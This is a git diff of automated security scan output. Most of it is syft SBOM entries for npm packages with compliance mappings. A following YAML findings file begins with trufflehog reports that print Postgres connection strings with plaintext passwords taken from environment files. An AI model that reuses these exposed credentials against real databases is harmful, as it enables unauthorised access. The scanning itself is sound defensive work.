"INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: yallist 4.0.0", + "title": "yallist 4.0.0", + "description": "Package discovered: yallist 4.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c85ae4ebdc6284ae", + "name": "yallist", + "version": "4.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:yallist:yallist:4.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/yallist@4.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "71c51c3c7b12c140", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: yargs 15.4.1", + "title": "yargs 15.4.1", + "description": "Package discovered: yargs 15.4.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bbb181fdab2eb6da", + "name": "yargs", + "version": "15.4.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:yargs:yargs:15.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/yargs@15.4.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz", + "integrity": "sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A==", + "dependencies": { + "cliui": "^6.0.0", + "decamelize": "^1.2.0", + "find-up": "^4.1.0", + "get-caller-file": "^2.0.1", + "require-directory": "^2.1.1", + "require-main-filename": "^2.0.0", + "set-blocking": "^2.0.0", + "string-width": "^4.2.0", + "which-module": "^2.0.0", + "y18n": "^4.0.0", + "yargs-parser": "^18.1.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "96fe97c2b6d8795a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: yargs 17.7.2", + "title": "yargs 17.7.2", + "description": "Package discovered: yargs 17.7.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c2726c8cb18290f2", + "name": "yargs", + "version": "17.7.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:yargs:yargs:17.7.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/yargs@17.7.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", + "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "dependencies": { + "cliui": "^8.0.1", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.3", + "y18n": "^5.0.5", + "yargs-parser": "^21.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ee09b685d8bedc8a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: yargs-parser 18.1.3", + "title": "yargs-parser 18.1.3", + "description": "Package discovered: yargs-parser 18.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "385fd2e9c795bcc7", + "name": "yargs-parser", + "version": "18.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:yargs:yargs-parser:18.1.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/yargs-parser@18.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz", + "integrity": "sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ==", + "dependencies": { + "camelcase": "^5.0.0", + "decamelize": "^1.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a4ff6cebec5b0be4", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: yargs-parser 21.1.1", + "title": "yargs-parser 21.1.1", + "description": "Package discovered: yargs-parser 21.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "95c25d265eed6eaf", + "name": "yargs-parser", + "version": "21.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:yargs:yargs-parser:21.1.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/yargs-parser@21.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "14bd34194369a5c5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: yocto-queue 0.1.0", + "title": "yocto-queue 0.1.0", + "description": "Package discovered: yocto-queue 0.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "813268dedfe3539f", + "name": "yocto-queue", + "version": "0.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:yocto-queue:yocto-queue:0.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yocto-queue:yocto_queue:0.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yocto_queue:yocto-queue:0.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yocto_queue:yocto_queue:0.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yocto:yocto-queue:0.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yocto:yocto_queue:0.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/yocto-queue@0.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", + "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "16bb4d5a9e7dc8d3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: yoga-layout 2.0.1", + "title": "yoga-layout 2.0.1", + "description": "Package discovered: yoga-layout 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "579e04e050802ec1", + "name": "yoga-layout", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:yoga-layout:yoga-layout:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yoga-layout:yoga_layout:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yoga_layout:yoga-layout:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yoga_layout:yoga_layout:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yoga:yoga-layout:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:yoga:yoga_layout:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/yoga-layout@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/yoga-layout/-/yoga-layout-2.0.1.tgz", + "integrity": "sha512-tT/oChyDXelLo2A+UVnlW9GU7CsvFMaEnd9kVFsaiCQonFAXd3xrHhkLYu+suwwosrAEQ746xBU+HvYtm1Zs2Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6ac3ad6fac7a8b51", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: zod 3.25.76", + "title": "zod 3.25.76", + "description": "Package discovered: zod 3.25.76", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c30d59c73bdda635", + "name": "zod", + "version": "3.25.76", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:zod:zod:3.25.76:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/zod@3.25.76", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz", + "integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + } + ] +} diff --git a/results/summaries/findings.yaml b/results/summaries/findings.yaml new file mode 100644 index 0000000..a15d5c5 --- /dev/null +++ b/results/summaries/findings.yaml @@ -0,0 +1,56690 @@ +meta: + output_version: 1.0.0 + jmo_version: 1.0.5 + schema_version: 1.2.0 + timestamp: '2026-05-21T06:36:10.198780Z' + scan_id: 202284b8-0052-4181-970d-ee2285144fcf + profile: '' + tools: + - checkov + - hadolint + - semgrep + - syft + - trivy + - trufflehog + - zap + target_count: 1 + finding_count: 712 + platform: Linux +findings: +- schemaVersion: 1.2.0 + id: d818f4846421d653 + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.env.docker.production.example + startLine: 0 + message: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - secrets + - unverified + risk: + cwe: + - CWE-798 + confidence: MEDIUM + likelihood: HIGH + impact: HIGH + raw: + SourceMetadata: + Data: + Filesystem: + file: /scan/.env.docker.production.example + line: 9 + SourceID: 1 + SourceType: 15 + SourceName: trufflehog - filesystem + DetectorType: 968 + DetectorName: Postgres + DetectorDescription: Postgres connection string containing credentials + DecoderName: PLAIN + Verified: false + VerificationError: 'lookup postgres on 192.168.65.7:53: no such host' + VerificationFromCache: false + Raw: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 + RawV2: postgresql://postgres:24DY&1u5FLCkNMeiO_p@postgres:5432 + Redacted: '' + ExtraData: + sslmode: + StructuredData: null + compliance: + owaspTop10_2021: + - A02:2021 + cweTop25_2024: + - id: CWE-798 + rank: 18 + category: Credentials + cisControlsV8_1: &id001 + - control: '3.11' + title: Encrypt Sensitive Data at Rest + implementationGroup: IG1 + - control: '5.4' + title: Restrict Administrator Privileges to Dedicated Administrator Accounts + implementationGroup: IG1 + nistCsf2_0: + - &id002 + function: PROTECT + category: PR.AC + subcategory: PR.AC-1 + description: Identities and credentials are issued, managed, verified, revoked, + and audited + - &id003 + function: PROTECT + category: PR.DS + subcategory: PR.DS-1 + description: Data-at-rest is protected + pciDss4_0: + - &id004 + requirement: 8.3.2 + description: Strong cryptography for authentication credentials + priority: CRITICAL + - &id005 + requirement: 8.2.1 + description: Verify user identity before credential modification + priority: HIGH + mitreAttack: + - &id006 + tactic: Credential Access + technique: T1552 + techniqueName: Unsecured Credentials + subtechnique: T1552.001 + subtechniqueName: Credentials in Files + - &id007 + tactic: Initial Access + technique: T1078 + techniqueName: Valid Accounts + subtechnique: '' + subtechniqueName: '' + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 35ed8d11af314afa + ruleId: Postgres + severity: MEDIUM + tool: + name: trufflehog + version: unknown + location: + path: /scan/.env.local + startLine: 0 + message: postgresql://postgres:password@postgres:5432 + title: Postgres secret + description: Potential secret detected by TruffleHog + remediation: Rotate credentials and purge from history. + references: [] + tags: + - 